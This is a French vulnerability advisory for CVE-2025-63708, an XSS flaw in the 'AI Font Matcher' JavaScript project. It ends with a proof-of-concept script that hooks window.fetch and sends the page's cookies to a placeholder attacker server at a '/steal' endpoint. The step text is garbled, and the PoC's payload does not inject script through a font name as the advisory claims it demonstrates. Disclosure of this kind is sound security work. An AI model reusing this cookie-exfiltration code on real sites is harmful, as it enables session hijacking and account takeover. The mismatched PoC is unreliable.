
ID CVE : CVE-2025-63708
Assigné : 11-12-2025
Type de problème : CWE-79 (Cross-Site Scripting)
Produit concerné : « AI Font Matcher » (publié le 2025-10-10, nid=18425)
Page produit : https://www.sourcecodester.com/javascript/18425/ai-font-matcher-using-html-css-and-javascript-source-code.html
Date de découverte : 2025-10-11
Chercheur : Dylan Davis
L’application traite des données issues d’un fetch webfonts sans assainir les noms de familles de polices. Un attaquant qui contrôle ou intercepte cette réponse peut injecter du JavaScript qui s’exécute dans le contexte de la page, permettant le vol de cookies de session et la prise de contrôle du compte.
Ce PoC démontre l’exécution de code en hookant window.fetch et en renvoyant une charge utile Web Fonts contrôlée.
poc.js).webfonts ; observez un alert(1).window.__origFetch = window.fetch;
window.fetch = async function(input, init) {
const url = (typeof input === 'string') ? input : input?.url;
if (url && url.includes('webfonts')) {
// Exfiltrate cookie to your server
fetch('http://[your-ip]:8001/steal?cookie=' +
encodeURIComponent(document.cookie))
.catch(e => console.log('Exfil failed:', e));
return new Response(JSON.stringify({
kind: "webfonts#webfontList",
items: [{ family: "Playfair Display", category: "serif" }]
}), {
status: 200,
headers: {'Content-Type': 'application/json'}
});
}
return window.__origFetch.apply(this, arguments);
};